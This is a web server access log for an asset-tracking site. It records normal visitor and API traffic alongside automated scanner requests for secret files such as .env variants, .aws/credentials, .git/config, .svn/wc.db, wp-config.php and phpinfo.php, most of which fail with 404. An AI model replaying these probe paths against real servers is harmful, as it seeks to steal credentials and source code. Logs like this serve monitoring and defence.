[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.live" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; moto e5 plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36" "-"
[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/awstats/.env" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Opera/9.80 (Android; Opera Mini/42.0.2254/150.36; U; en) Presto/2.12.423 Version/12.16" "-"
[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Opera/9.20 (Macintosh; Intel Mac OS X; U; en)" "-"
[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/crm/.env" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A403 Safari/8536.25" "-"
[15/Feb/2026:18:08:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.prod" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; SM-J700F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36" "-"
[15/Feb/2026:18:08:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws.env" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-"
[15/Feb/2026:18:08:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.env" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" "-"
[15/Feb/2026:18:08:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.aws/credentials" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-"
[15/Feb/2026:20:02:22 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr"
[15/Feb/2026:20:02:23 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr"
[15/Feb/2026:20:27:14 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-"
[15/Feb/2026:20:27:15 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:20:27:15 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:20:27:15 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:20:27:15 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:20:27:15 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:20:27:55 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 3800] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:23:01:15 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 3.128.190.80] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" "-"
[16/Feb/2026:01:44:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[16/Feb/2026:01:44:50 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:01:44:50 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:01:44:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:01:44:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:01:44:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:01:44:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:01:44:51 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:01:45:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 4139] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:02:28:32 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 195.178.110.132] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:33 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 195.178.110.132] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/%22/static/js/app.js%22" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.bak" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.save" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.backup" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-"
[16/Feb/2026:02:28:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/backend/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws-config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws.config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_debugbar/" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/debugbar/" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/debug/" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-"
[16/Feb/2026:02:28:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/phpinfo.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/info.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/test.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.aws/credentials" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.aws/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws-credentials" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws.json" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-"
[16/Feb/2026:02:28:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.s3cfg" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/HEAD" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:02:28:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[16/Feb/2026:03:02:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-"
[16/Feb/2026:03:02:08 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-"
[16/Feb/2026:03:02:14 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "-" "-"
[16/Feb/2026:03:02:18 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-"
[16/Feb/2026:03:02:21 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 195.178.110.242] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-"
[16/Feb/2026:03:05:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 216.81.248.168] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 7.1.1; XT1710-02 Build/NDS26.74-36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36" "-"
[16/Feb/2026:05:01:37 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3803.0 Safari/537.36 Edg/76.0.174.0" "-"
[16/Feb/2026:05:33:39 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.git/HEAD" [Client 47.157.161.137] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0" "-"
[16/Feb/2026:05:34:00 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.env" [Client 27.79.121.109] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-"
[16/Feb/2026:05:34:02 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.svn/wc.db" [Client 45.183.2.117] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-"
[16/Feb/2026:05:42:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[16/Feb/2026:05:42:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:05:42:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:05:42:57 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:05:42:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:05:42:57 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:05:43:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 2770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:06:44:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-"
[16/Feb/2026:06:44:06 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:06:44:06 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:06:44:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:06:44:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:06:44:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:06:44:49 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 4156] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:07:16:20 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 54.162.53.4] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" "-"
[16/Feb/2026:07:16:20 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 54.162.53.4] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-"
[16/Feb/2026:08:11:46 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[16/Feb/2026:08:11:48 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[16/Feb/2026:08:13:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2" "-"
[16/Feb/2026:08:37:36 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 91.224.92.99] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp-includes/ID3/license.txt" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//feed/" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
